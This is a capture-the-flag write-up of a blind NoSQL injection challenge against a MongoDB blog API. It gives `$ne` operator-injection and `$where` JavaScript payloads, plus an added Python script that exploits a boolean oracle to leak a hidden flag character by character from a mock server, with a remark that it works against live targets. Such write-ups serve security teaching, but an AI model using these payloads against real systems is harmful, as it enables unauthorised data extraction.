Tags: web nosql-injection 

Rating: 4.5

This is a Blind NoSQL Injection attack.

1. Recognize the NoSQL Injection vulnerability with the payload `GET /api/posts?title[%24ne]=`: the query-string key becomes the `$ne` operator in the server-side filter (`{title: {$ne: ""}}`), so every post is returned instead of one matching title.
2. Develop an exploit that scans the post contents for the string “flag” using MongoDB's `$where` operator, which evaluates attacker-supplied JavaScript against each document: `/api/posts?%24where=function(){return%20this.content.includes('flag')}`.
3. The response to that payload shows the server still redacts the flag post's content, but whether the redacted post appears at all depends on the `$where` predicate, which gives a boolean oracle. Develop a script that uses this oracle to enumerate which characters occur in the flag (see the section titled Enumerating the Flag Alphabet).
4. Adapt the script from step 3 to leak the flag character by character, extending a known prefix with candidates from the enumerated alphabet and watching the server's response (see the section titled Disclosing the Flag).
5. `Pr0f1t!`
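The whole procedure above (operator injection, `$where` substring probe, alphabet enumeration, then character-by-character disclosure), as an added Python example that is not the original write-up's script. The "server" is a constructed in-memory stand-in that mimics the behaviour the steps rely on (posts matching `$where` are returned, but the flag post's content is redacted); the flag value, the post titles, the `/api/posts` path, the `flag{` prefix and the "a redacted post appeared in the response" oracle are assumptions made for the example.

```python
"""Blind boolean NoSQL injection through MongoDB's $where (added example).

The MockBlog class is a constructed stand-in for the challenge server, not
its real code. Assumed: hidden post content "flag{n0_sql_n0_pr0bl3m}", API
path /api/posts, and the oracle "a redacted post survived the filter".
"""
import re
import string
from urllib.parse import urlencode, urlparse, parse_qs

REDACTED = "[REDACTED]"

# --- payload construction -------------------------------------------------

def js_str(s: str) -> str:
    """Single-quoted JavaScript string literal with backslash and quote escaped."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def ne_url() -> str:
    """Step 1: title[$ne]= turns the title filter into {title: {$ne: ""}}."""
    return "/api/posts?" + urlencode({"title[$ne]": ""})

def where_url(js_expr: str) -> str:
    """Step 2: /api/posts?$where=function(){return <expr>} (URL-encoded)."""
    return "/api/posts?" + urlencode({"$where": "function(){return " + js_expr + "}"})

def includes_url(needle: str) -> str:
    return where_url("this.content.includes(" + js_str(needle) + ")")

# --- constructed stand-in for the vulnerable server -----------------------

class MockBlog:
    """Mimics the observed server behaviour; not the real challenge code."""
    _INCLUDES = re.compile(
        r"^function\(\)\{return this\.content\.includes\('((?:[^'\\]|\\.)*)'\)\}$")

    def __init__(self, flag: str):
        self.posts = [
            {"title": "hello", "content": "first post on the deep web blog"},
            {"title": "secret", "content": flag, "hidden": True},  # assumed flag post
        ]

    def get(self, url: str):
        qs = parse_qs(urlparse(url).query, keep_blank_values=True)
        posts = self.posts
        if "title[$ne]" in qs:                       # operator injection
            posts = [p for p in posts if p["title"] != qs["title[$ne]"][0]]
        if "$where" in qs:                           # server-side JS predicate
            m = self._INCLUDES.match(qs["$where"][0])
            if not m:
                raise ValueError("mock only evaluates this.content.includes('...')")
            needle = re.sub(r"\\(.)", r"\1", m.group(1))  # undo JS string escapes
            posts = [p for p in posts if needle in p["content"]]
        # The hidden post is returned, but with its content redacted: the oracle.
        return [{"title": p["title"],
                 "content": REDACTED if p.get("hidden") else p["content"]}
                for p in posts]

# --- blind extraction ------------------------------------------------------

def oracle(send, needle: str) -> bool:
    """True iff the redacted (flag) post survives the $where filter."""
    return any(p["content"] == REDACTED for p in send(includes_url(needle)))

def enumerate_alphabet(send, candidates=string.printable.strip()) -> str:
    """Step 3: which single characters occur in the flag post at all."""
    return "".join(c for c in candidates if oracle(send, c))

def leak_flag(send, alphabet: str, prefix: str = "flag{", end: str = "}") -> str:
    """Step 4: extend the known prefix one character at a time."""
    known = prefix
    while not known.endswith(end):
        for c in alphabet:
            if oracle(send, known + c):
                known += c
                break
        else:
            raise RuntimeError("no character extends %r" % known)
    return known

if __name__ == "__main__":
    blog = MockBlog("flag{n0_sql_n0_pr0bl3m}")      # constructed target
    print(includes_url("flag"))
    alphabet = enumerate_alphabet(blog.get)
    print("alphabet:", alphabet)
    print("flag:", leak_flag(blog.get, alphabet))
```

Against a live target, `send` would be a function that issues the GET and returns the decoded JSON post list; everything else stays the same. Enumerating the alphabet first cuts the per-position probes from the full printable set to the dozen or so characters the flag actually uses, which is why the write-up does it before the character-by-character leak.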

Original writeup (https://ajmalsiddiqui.me/blog/squarectf-2020-deep-web-blog/).